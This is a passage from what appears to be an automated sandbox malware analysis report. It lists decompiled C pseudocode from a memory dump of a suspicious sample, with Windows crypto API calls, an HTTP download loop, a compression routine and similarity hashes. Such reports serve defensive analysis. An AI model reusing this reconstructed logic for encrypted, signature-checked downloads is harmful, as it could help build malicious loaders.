                  											_t378 =  *((intOrPtr*)(_t417 + 0x30));
                  											if(_t378 <  *((intOrPtr*)(_t417 + 0x34))) {
                  												 *_t378 =  *(_t417 + 0x48);
                  												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  											}
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  										} while ( *(_t417 + 0x44) >= 8);
                  										goto L38;
                  									}
                  									 *((intOrPtr*)(_t417 + 0x30)) = _t411;
                  									_t130 =  &_v8; // 0x40473a
                  									 *(_t417 + 0x48) = 0 << _t358 |  *_t130;
                  									_t324 = _t358 + 2;
                  									_t416 = 8;
                  									 *(_t417 + 0x44) = _t324;
                  									if(_t324 < _t416) {
                  										L52:
                  										_t382 =  *(_t417 + 0x44);
                  										if(_t382 == 0) {
                  											L57:
                  											_t359 = 2;
                  											_t406 = _t359;
                  											do {
                  												_t383 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(_t417 + 0x3c) & 0x0000ffff) << _t383;
                  												_t162 = _t383 + 0x10; // 0x108
                  												_t327 = _t162;
                  												 *(_t417 + 0x44) = _t327;
                  												if(_t327 < _t416) {
                  													goto L62;
                  												} else {
                  													goto L59;
                  												}
                  												do {
                  													L59:
                  													_t386 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t386 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t386 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= _t416);
                  												L62:
                  												 *(_t417 + 0x3c) =  *(_t417 + 0x3c) ^ 0x0000ffff;
                  												_t406 = _t406 - 1;
                  											} while (_t406 != 0);
                  											if( *(_t417 + 0x3c) <= _t406) {
                  												goto L31;
                  											} else {
                  												goto L64;
                  											}
                  											do {
                  												L64:
                  												_t384 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(( *((intOrPtr*)(_t417 + 0x40)) + _t406 & 0x00007fff) + _t417 + 0x90) & 0x000000ff) << _t384;
                  												_t183 = _t384 + 8; // 0x100
                  												_t333 = _t183;
                  												 *(_t417 + 0x44) = _t333;
                  												if(_t333 < _t416) {
                  													goto L68;
                  												} else {
                  													goto L65;
                  												}
                  												do {
                  													L65:
                  													_t385 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t385 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t385 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= _t416);
                  												L68:
                  												_t406 = _t406 + 1;
                  											} while (_t406 <  *(_t417 + 0x3c));
                  											goto L31;
                  										}
                  										 *(_t417 + 0x44) = _t416;
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t382;
                  										do {
                  											_t387 =  *((intOrPtr*)(_t417 + 0x30));
                  											if(_t387 <  *((intOrPtr*)(_t417 + 0x34))) {
                  												 *_t387 =  *(_t417 + 0x48);
                  												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  											}
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  										} while ( *(_t417 + 0x44) >= _t416);
                  										goto L57;
                  									} else {
                  										goto L49;
                  									}
                  									do {
                  										L49:
                  										_t388 =  *((intOrPtr*)(_t417 + 0x30));
                  										if(_t388 <  *((intOrPtr*)(_t417 + 0x34))) {
                  											 *_t388 =  *(_t417 + 0x48);
                  											 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  										}
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  										 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  									} while ( *(_t417 + 0x44) >= _t416);
                  									goto L52;
                  								}
                  								if(( *(_t417 + 8) & 0x00040000) != 0 ||  *(_t417 + 0x3c) < 0x30) {
                  									_t400 = 1;
                  								}
                  								_t401 = E0040378E(_t417, _t400);
                  								if( *(_t417 + 0x3c) == 0 ||  *((intOrPtr*)(_t417 + 0x30)) - _t411 + 1 <  *(_t417 + 0x3c)) {
                  									goto L28;
                  								} else {
                  									goto L47;
                  								}
                  							} else {
                  								goto L19;
                  							}
                  							do {
                  								L19:
                  								_t393 =  *((intOrPtr*)(_t417 + 0x30));
                  								if(_t393 <  *((intOrPtr*)(_t417 + 0x34))) {
                  									 *_t393 =  *(_t417 + 0x48);
                  									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  								}
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  							} while ( *(_t417 + 0x44) >= _t410);
                  							goto L22;
                  						} else {
                  							_t394 =  *(_t417 + 0x44);
                  							_t342 = 0x78;
                  							 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t342 << _t394;
                  							_t344 = _t394 + 8;
                  							 *(_t417 + 0x44) = _t344;
                  							if(_t344 < _t410) {
                  								L14:
                  								_t395 =  *(_t417 + 0x44);
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) | 1 << _t395;
                  								_t47 = _t395 + 8; // 0x100
                  								_t348 = _t47;
                  								 *(_t417 + 0x44) = _t348;
                  								if(_t348 < _t410) {
                  									goto L18;
                  								} else {
                  									goto L15;
                  								}
                  								do {
                  									L15:
                  									_t396 =  *((intOrPtr*)(_t417 + 0x30));
                  									if(_t396 <  *((intOrPtr*)(_t417 + 0x34))) {
                  										 *_t396 =  *(_t417 + 0x48);
                  										 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  									}
                  									 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  									 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  								} while ( *(_t417 + 0x44) >= _t410);
                  								goto L18;
                  							} else {
                  								goto L11;
                  							}
                  							do {
                  								L11:
                  								_t397 =  *((intOrPtr*)(_t417 + 0x30));
                  								if(_t397 <  *((intOrPtr*)(_t417 + 0x34))) {
                  									 *_t397 =  *(_t417 + 0x48);
                  									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  								}
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  							} while ( *(_t417 + 0x44) >= _t410);
                  							goto L14;
                  						}
                  					}
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$memcpy
                  • String ID: 0HCw$:G@
                  • API String ID: 368790112-2591896426
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: bff9ad06bf82d853f9c70daa61a207c77b125d2d5e3c741b47fcf7fead7e8f56
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 20023171601B108FC776CF29C680523BBF5BF55B227604A2EC6E796E91D23AF941CB08
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 28%
                  			E0040215A(void* __ecx, intOrPtr* __edx, BYTE** _a4) {
                  				long* _v8;
                  				intOrPtr* _v12;
                  				intOrPtr _t17;
                  				void* _t20;
                  				BYTE* _t21;
                  				void* _t33;
                  				BYTE** _t35;
                  				void* _t51;
                  				BYTE* _t54;
                  				DWORD* _t56;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_v12 = __edx;
                  				_t17 =  *((intOrPtr*)(__edx + 4));
                  				_t51 = 0;
                  				_t54 = _t17 - 0x74;
                  				if(_t17 >= 0x74) {
                  					_t19 =  !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54;
                  					__eflags = _t54 - ( !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54);
                  					if(_t54 != ( !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54)) {
                  						goto L1;
                  					} else {
                  						_t35 = _a4;
                  						_t35[1] = _t54;
                  						_t21 = E004014F2(_t54);
                  						 *_t35 = _t21;
                  						if(_t21 != 0) {
                  							_v12 =  *_v12;
                  							_push( &_v8);
                  							_push(0);
                  							_push(0);
                  							_push( *0x41651c);
                  							if( *0x4133b4() == 0) {
                  								_t15 =  &(_t35[1]); // 0x406220
                  								_t56 = _t15;
                  								goto L10;
                  							} else {
                  								E0040151F( *_t35, _v12 + 0x74, _t54);
                  								_t10 =  &(_t35[1]); // 0x406220
                  								_t56 = _t10;
                  								if(CryptDecrypt( *0x416518, _v8, 1, 0,  *_t35, _t56) != 0) {
                  									 *0x412f04(_v8, _v12, 0x60,  *0x416514, 0, 0);
                  									_t33 = 1;
                  									_t51 =  !=  ? _t33 : 0;
                  								}
                  								 *0x413608(_v8);
                  								if(_t51 == 0) {
                  									L10:
                  									E00401532( *_t35);
                  									 *_t35 =  *_t35 & 0x00000000;
                  									 *_t56 =  *_t56 & 0x00000000;
                  								}
                  							}
                  						}
                  						_t20 = _t51;
                  					}
                  				} else {
                  					L1:
                  					_t20 = 0;
                  				}
                  				return _t20;
                  			}

                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,0040C894,00000104,0040C6FC,00000000,?,?,?,0040621C,0040C894), ref: 004021BE
                  • CryptDecrypt.ADVAPI32(0040C894,00000001,00000000,0040621C,00406220,?,?,?,0040621C,0040C894), ref: 004021EC
                  • CryptVerifySignatureW.ADVAPI32(0040C894,0040621C,00000060,00000000,00000000,?,?,?,0040621C,0040C894), ref: 00402208
                  • CryptDestroyHash.ADVAPI32(0040C894,?,?,?,0040621C,0040C894), ref: 00402219
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DecryptDestroyDuplicateSignatureVerify
                  • String ID:
                  • API String ID: 1014757615-0
                  • Opcode ID: 09569594b61da52c59d40f425788a8422af23cb8887ee059169b09b77780c7a0
                  • Instruction ID: 04f31bdf2388faa97c57a2fd3933937c900cc02f324019b7ba81707c3369ae23
                  • Opcode Fuzzy Hash: 09569594b61da52c59d40f425788a8422af23cb8887ee059169b09b77780c7a0
                  • Instruction Fuzzy Hash: A3318C31700110BFDB118F64DD44BAA7BBAEF88711F1040AAF901EB2E4DBB1AE019A59
                  Uniqueness

                  Uniqueness Score: 0.53%

                  C-Code - Quality: 21%
                  			E0040207B(intOrPtr* __edx, signed int* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr* _v12;
                  				char _v16;
                  				signed int _v20;
                  				char _t26;
                  				signed int _t27;
                  				void* _t39;
                  				void* _t41;
                  				signed int _t42;
                  				intOrPtr _t49;
                  				intOrPtr _t56;
                  				signed int* _t58;
                  				void* _t59;
                  
                  				_v12 = __edx;
                  				_t26 =  *((intOrPtr*)(__edx + 4));
                  				_t42 = _t26 + 1;
                  				if((_t42 & 0x0000000f) != 0) {
                  					_t42 = (_t42 & 0xfffffff0) + 0x10;
                  				}
                  				_t58 = _a4;
                  				_v16 = _t26;
                  				_t59 = 0;
                  				_t58[1] = _t42 + 0x74;
                  				_t27 = E004014F2(_t42 + 0x74);
                  				_v20 = _t27;
                  				 *_t58 = _t27;
                  				if(_t27 == 0) {
                  					L9:
                  					return _t59;
                  				} else {
                  					_v8 = _t27 + 0x74;
                  					_push( &_a4);
                  					_push(0);
                  					_push(0);
                  					_push( *0x41651c);
                  					if( *0x4133b4() == 0) {
                  						L8:
                  						E00401532( *_t58);
                  						 *_t58 =  *_t58 & 0x00000000;
                  						_t58[1] = _t58[1] & 0x00000000;
                  						goto L9;
                  					}
                  					E0040151F(_v8,  *_v12,  *((intOrPtr*)(_v12 + 4)));
                  					_push(_t42);
                  					_push( &_v16);
                  					_push(_v8);
                  					_push(0);
                  					_push(1);
                  					_push(_a4);
                  					_push( *0x416518);
                  					if( *0x413124() != 0) {
                  						_t43 = _v20;
                  						_t56 =  *0x416518; // 0x2397f8
                  						_t49 =  *0x416514; // 0x2396a0
                  						_t39 = E00401F11(_t49, _t56, _v20);
                  						_pop(_t50);
                  						if(_t39 != 0) {
                  							E00401F56(_a4, _t43 + 0x60);
                  							_t41 = 1;
                  							_t59 =  !=  ? _t41 : 0;
                  						}
                  					}
                  					 *0x413608(_a4);
                  					if(_t59 != 0) {
                  						goto L9;
                  					} else {
                  						goto L8;
                  					}
                  				}
                  			}

                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,00000000,0040C6FC,00000000,00000104,0040616B,?,00000000,000CD140), ref: 004020CC
                  • CryptEncrypt.ADVAPI32(?,00000001,00000000,?,?,?), ref: 004020FD
                  • CryptDestroyHash.ADVAPI32(?), ref: 00402139
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DestroyDuplicateEncrypt
                  • String ID:
                  • API String ID: 1128268866-0
                  • Opcode ID: 4e59cee7960c38e8b5ee7e5856dafefdb3e81cdfc3becf9d1b757b82fba9955f
                  • Instruction ID: e215d4e7104d4b47444e5095201a7053bbba18aa046f11bf0f453833bd48b0d0
                  • Opcode Fuzzy Hash: 4e59cee7960c38e8b5ee7e5856dafefdb3e81cdfc3becf9d1b757b82fba9955f
                  • Instruction Fuzzy Hash: 3E21A271A00206BFDB10DF64DD44AAABBB9FF04354B10817AE905DB2A1EB74DE40CB94
                  Uniqueness

                  Uniqueness Score: 0.65%

                  APIs
                  • CryptExportKey.ADVAPI32(002397F8,002396A0,00000001,00000040,?,?,00000000), ref: 00401F2F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptExport
                  • String ID: l
                  • API String ID: 3389274496-2517025534
                  • Opcode ID: 3ca03c0b0af9f491b2816fad542ac85e238e487dba8f6d51c2e98b0d322ebe00
                  • Instruction ID: 8de1b0b566f387a962e970ad356d4eae64fe2c0c17b5e81973823825b819e613
                  • Opcode Fuzzy Hash: 3ca03c0b0af9f491b2816fad542ac85e238e487dba8f6d51c2e98b0d322ebe00
                  • Instruction Fuzzy Hash: 83F02730900218ABDB10DF64CC44EFEBBBDDB05B44F1001AAED05E7280E6709E0487E4
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 100%
                  			E00401383(void* __ecx, intOrPtr* __edx, void* __eflags) {
                  				long _v8;
                  				long _v12;
                  				void* _v16;
                  				intOrPtr* _v20;
                  				long _t15;
                  				int _t18;
                  				long _t24;
                  				intOrPtr* _t28;
                  				void* _t30;
                  				void* _t32;
                  				long _t34;
                  
                  				_v20 = __edx;
                  				_t30 = 5;
                  				_v16 = __ecx;
                  				_t15 = E00401316(__ecx, _t30);
                  				_t34 = 0;
                  				_t24 = _t15;
                  				_v12 = 0;
                  				if(_t24 != 0) {
                  					_t32 = E004014F2(_t24);
                  					if(_t32 == 0) {
                  						_t18 = 0;
                  						L10:
                  						return _t18;
                  					}
                  					_v8 = 0;
                  					if(_t24 == 0) {
                  						L7:
                  						E00401532(_t32);
                  						_t18 = _v12;
                  						if(_t18 == 0) {
                  							goto L10;
                  						}
                  						L8:
                  						_t28 = _v20;
                  						 *_t28 = _t32;
                  						 *((intOrPtr*)(_t28 + 4)) = _t34;
                  						goto L10;
                  					} else {
                  						goto L3;
                  					}
                  					while(1) {
                  						L3:
                  						_t18 = InternetReadFile(_v16, _t32 + _t34, _t24 - _t34,  &_v8);
                  						_v12 = _t18;
                  						if(_t18 == 0) {
                  							goto L7;
                  						}
                  						if(_v8 == 0) {
                  							goto L8;
                  						}
                  						_t34 = _t34 + _v8;
                  						if(_t34 < _t24) {
                  							continue;
                  						}
                  						goto L8;
                  					}
                  					goto L7;
                  				}
                  				return 0;
                  			}

                  APIs
                    • Part of subcall function 00401316: HttpQueryInfoW.WININET(00000000,00000013,00000000,00000000,00000000), ref: 00401334
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • InternetReadFile.WININET(?,00000000,00000000,?), ref: 004013CD
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateFileHttpInfoInternetProcessQueryRead
                  • String ID:
                  • API String ID: 561080696-0
                  • Opcode ID: 7ff914bd12d0651914ed9571272a890d1b1ecacf876fd1c2157c33efa916e31d
                  • Instruction ID: 451bea8f2ca32b148c1c73ffebc7c3b8197519079505de83237b7c8d80f81208
                  • Opcode Fuzzy Hash: 7ff914bd12d0651914ed9571272a890d1b1ecacf876fd1c2157c33efa916e31d
                  • Instruction Fuzzy Hash: 67117371B00215ABDB119E9E9980AAEFBF8AF44704B14417FE904F33A1D7B5DD019B94
                  Uniqueness

                  Uniqueness Score: 0.04%

                  APIs
                  • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000), ref: 00401F6B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptHashParam
                  • String ID:
                  • API String ID: 1839025277-0
                  • Opcode ID: 496b6ce24351a1596fbace5237037a10789b3b74501e142722ab8e206ca54b84
                  • Instruction ID: ea0d1c88b8beea22a5d58a2278bf81109cad106d3917202b53e93bae8ff64b58
                  • Opcode Fuzzy Hash: 496b6ce24351a1596fbace5237037a10789b3b74501e142722ab8e206ca54b84
                  • Instruction Fuzzy Hash: BAC012B055020CBFE614CB40DD0AFBAB7ACD744B05F404198BD0462281E6B15E0055B1
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 100%
                  			E0040436D(intOrPtr* __ecx) {
                  				char _v5;
                  				intOrPtr _v12;
                  				intOrPtr* _v16;
                  				signed int _v20;
                  				intOrPtr _v24;
                  				signed int _v28;
                  				char _v32;
                  				signed int _v36;
                  				intOrPtr _t155;
                  				signed int _t161;
                  				void* _t167;
                  				signed int _t178;
                  				void* _t189;
                  				signed int _t192;
                  				signed int _t203;
                  				signed char _t213;
                  				signed int _t217;
                  				signed char _t219;
                  				signed int _t220;
                  				intOrPtr _t224;
                  				intOrPtr _t226;
                  				signed int _t228;
                  				signed int _t231;
                  				intOrPtr _t234;
                  				void* _t236;
                  				intOrPtr* _t240;
                  				intOrPtr _t243;
                  				intOrPtr _t244;
                  				signed int _t250;
                  				intOrPtr* _t253;
                  				intOrPtr* _t257;
                  				intOrPtr _t258;
                  				signed int _t260;
                  				signed int _t264;
                  				signed int _t267;
                  				intOrPtr* _t274;
                  				intOrPtr _t275;
                  				void* _t276;
                  				signed int _t277;
                  				signed int _t279;
                  				signed int _t281;
                  				void* _t283;
                  
                  				_t274 = __ecx;
                  				_t257 =  *((intOrPtr*)(__ecx + 0x84));
                  				_t275 =  *((intOrPtr*)(__ecx + 0x88));
                  				_t155 =  *((intOrPtr*)(__ecx + 0x80));
                  				_v16 = _t257;
                  				_v12 = _t275;
                  				_v24 = _t155;
                  				L2:
                  				while(_t275 != 0 || _t155 != 0 &&  *((intOrPtr*)(_t274 + 0x20)) != _t275) {
                  					_t224 =  *((intOrPtr*)(_t274 + 0x20));
                  					if( *((intOrPtr*)(_t274 + 0x24)) + _t224 < 2) {
                  						while(_t275 != 0) {
                  							if( *((intOrPtr*)(_t274 + 0x20)) >= 0x102) {
                  								L12:
                  								_t258 =  *((intOrPtr*)(_t274 + 0x20));
                  								_t226 =  <  ? 0x8000 - _t258 :  *((intOrPtr*)(_t274 + 0x24));
                  								 *((intOrPtr*)(_t274 + 0x24)) = _t226;
                  								if(_v24 != 0 || _t258 >= 0x102) {
                  									_t217 = 0;
                  									_t276 = 2;
                  									_t277 =  !=  ?  *(_t274 + 0x50) : _t276;
                  									_t161 =  *(_t274 + 0x1c) & 0x00007fff;
                  									_v28 = 1;
                  									_v32 = 0;
                  									_v36 = _t277;
                  									_v20 = _t161;
                  									if(( *(_t274 + 8) & 0x00090000) == 0) {
                  										E00403C52( &_v32, _t274,  *(_t274 + 0x1c), _t226, _t258,  &_v32,  &_v36);
                  										_t217 = _v32;
                  										_t283 = _t283 + 0x10;
                  										_t277 = _v36;
                  										_t228 = _v20;
                  										L32:
                  										if(_t277 != 3 || _t217 < 0x2000) {
                  											L34:
                  											if(_t228 == _t217 || ( *(_t274 + 8) & 0x00020000) != 0 && _t277 <= 5) {
                  												goto L37;
                  											} else {
                  												goto L38;
                  											}
                  										} else {
                  											L37:
                  											_t277 = 0;
                  											_t217 = 0;
                  											L38:
                  											_t260 =  *(_t274 + 0x50);
                  											if(_t260 == 0) {
                  												if(_t217 != 0) {
                  													if( *((intOrPtr*)(_t274 + 0x14)) != 0 || ( *(_t274 + 8) & 0x00010000) != 0 || _t277 >= 0x80) {
                  														E004042D4(_t274, _t277, _t217);
                  														L53:
                  														_t231 = _t277;
                  														goto L54;
                  													} else {
                  														_t178 =  <  ? _t228 : 0x8100;
                  														L51:
                  														 *(_t274 + 0x54) =  *(_t178 + _t274 + 0x90) & 0x000000ff;
                  														 *((intOrPtr*)(_t274 + 0x4c)) = _t217;
                  														 *(_t274 + 0x50) = _t277;
                  														L46:
                  														_t231 = _v28;
                  														L54:
                  														 *(_t274 + 0x1c) =  *(_t274 + 0x1c) + _t231;
                  														 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) - _t231;
                  														_t167 =  *((intOrPtr*)(_t274 + 0x24)) + _t231;
                  														_t233 =  <  ? _t167 : 0x8000;
                  														 *((intOrPtr*)(_t274 + 0x24)) =  <  ? _t167 : 0x8000;
                  														_t234 =  *((intOrPtr*)(_t274 + 0x28));
                  														if(_t234 > _t274 + 0x1926a) {
                  															L58:
                  															_t275 = _v12;
                  															 *((intOrPtr*)(_t274 + 0x84)) = _v16;
                  															 *((intOrPtr*)(_t274 + 0x88)) = _t275;
                  															_t236 = E004037A9(_t274, 0);
                  															if(_t236 != 0) {
                  																return 0 | _t236 > 0x00000000;
                  															}
                  															_t155 = _v24;
                  															L1:
                  															_t257 = _v16;
                  															goto L2;
                  														}
                  														_t275 = _v12;
                  														_t155 = _v24;
                  														if( *((intOrPtr*)(_t274 + 0x3c)) <= 0x7c00) {
                  															goto L1;
                  														}
                  														if((_t234 - _t274 - 0x9272) * 0x73 >> 7 >=  *((intOrPtr*)(_t274 + 0x3c))) {
                  															goto L58;
                  														}
                  														_t155 = _v24;
                  														if(( *(_t274 + 8) & 0x00080000) == 0) {
                  															goto L1;
                  														}
                  														goto L58;
                  													}
                  												}
                  												_t181 =  <  ? _t228 : 0x8100;
                  												E004042A2(_t274,  *((intOrPtr*)(( <  ? _t228 : 0x8100) + _t274 + 0x90)));
                  												goto L46;
                  											}
                  											_t240 = _t274;
                  											if(_t277 <= _t260) {
                  												E004042D4(_t240, _t260,  *((intOrPtr*)(_t274 + 0x4c)));
                  												_t231 =  *(_t274 + 0x50) - 1;
                  												 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
                  												goto L54;
                  											}
                  											E004042A2(_t240,  *(_t274 + 0x54));
                  											if(_t277 < 0x80) {
                  												_t178 = _v20;
                  												goto L51;
                  											}
                  											E004042D4(_t240, _t277, _t217);
                  											 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
                  											goto L53;
                  										}
                  									}
                  									_t228 = _t161;
                  									if(_t226 != 0 && ( *(_t274 + 8) & 0x00080000) == 0) {
                  										_t277 = 0;
                  										_v5 =  *((intOrPtr*)((_t228 - 0x00000001 & 0x00007fff) + _t274 + 0x90));
                  										if(_t258 == 0) {
                  											L30:
                  											_t277 = 0;
                  											goto L34;
                  										}
                  										_t189 = _t228 + _t274;
                  										_t243 = _v5;
                  										while( *((intOrPtr*)(_t189 + _t277 + 0x90)) == _t243) {
                  											_t277 = _t277 + 1;
                  											if(_t277 < _t258) {
                  												continue;
                  											}
                  											break;
                  										}
                  										_t228 = _v20;
                  										if(_t277 < 3) {
                  											goto L30;
                  										}
                  										_t217 = 1;
                  									}
                  									goto L32;
                  								} else {
                  									_t257 = _v16;
                  									goto L61;
                  								}
                  							}
                  							_t219 =  *_t257;
                  							_t192 =  *(_t274 + 0x1c) +  *((intOrPtr*)(_t274 + 0x20)) & 0x00007fff;
                  							_t257 = _t257 + 1;
                  							_t275 = _t275 - 1;
                  							_v16 = _t257;
                  							_v12 = _t275;
                  							 *(_t192 + _t274 + 0x90) = _t219;
                  							if(_t192 < 0x101) {
                  								 *(_t192 + _t274 + 0x8090) = _t219;
                  							}
                  							 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) + 1;
                  							_t244 =  *((intOrPtr*)(_t274 + 0x20));
                  							if( *((intOrPtr*)(_t274 + 0x24)) + _t244 >= 3) {
                  								_t279 =  *(_t274 + 0x1c) + _t244 + 0xfffffffd;
                  								_t264 = _t279 & 0x00007fff;
                  								_t250 = (( *(_t264 + _t274 + 0x90) & 0x000000ff) << 0x0000000a ^ _t219 & 0x000000ff) & 0x00007fff ^ ( *((_t279 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0xff) << 0x00000005;
                  								 *((short*)(_t274 + 0x19272 + _t264 * 2)) =  *(_t274 + 0x29272 + _t250 * 2);
                  								_t257 = _v16;
                  								 *(_t274 + 0x29272 + _t250 * 2) = _t279;
                  								_t275 = _v12;
                  							}
                  						}
                  						goto L12;
                  					}
                  					_t203 =  *(_t274 + 0x1c) + _t224;
                  					_t281 = _t203 & 0x00007fff;
                  					_t220 = _t203 - 2;
                  					_t267 = ( *((_t220 & 0x00007fff) + _t274 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t220 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0x000000ff;
                  					_t211 =  <  ? _v12 : 0x102 - _t224;
                  					_v12 = _v12 - 0x102;
                  					_t212 = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
                  					_v28 = _v16 + 0x102;
                  					 *((intOrPtr*)(_t274 + 0x20)) = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
                  					while(1) {
                  						_t253 = _v16;
                  						if(_t253 == _v28) {
                  							break;
                  						}
                  						_t213 =  *_t253;
                  						_v16 = _t253 + 1;
                  						 *(_t274 + _t281 + 0x90) = _t213;
                  						if(_t281 < 0x101) {
                  							 *(_t281 + _t274 + 0x8090) = _t213;
                  						}
                  						_t267 = (_t267 << 0x00000005 ^ _t213 & 0x000000ff) & 0x00007fff;
                  						_t281 = _t281 + 0x00000001 & 0x00007fff;
                  						 *((short*)(_t274 + 0x19272 + (_t220 & 0x00007fff) * 2)) =  *(_t274 + 0x29272 + _t267 * 2);
                  						 *(_t274 + 0x29272 + _t267 * 2) = _t220;
                  						_t220 = _t220 + 1;
                  					}
                  					_t275 = _v12;
                  					goto L12;
                  				}
                  				L61:
                  				 *((intOrPtr*)(_t274 + 0x84)) = _t257;
                  				 *((intOrPtr*)(_t274 + 0x88)) = _t275;
                  				return 1;
                  			}

                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction ID: e33084252fcec48e949ebcca89b2b69e4ca8ec5097f1102ae8c543975fbc8947
                  • Opcode Fuzzy Hash: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
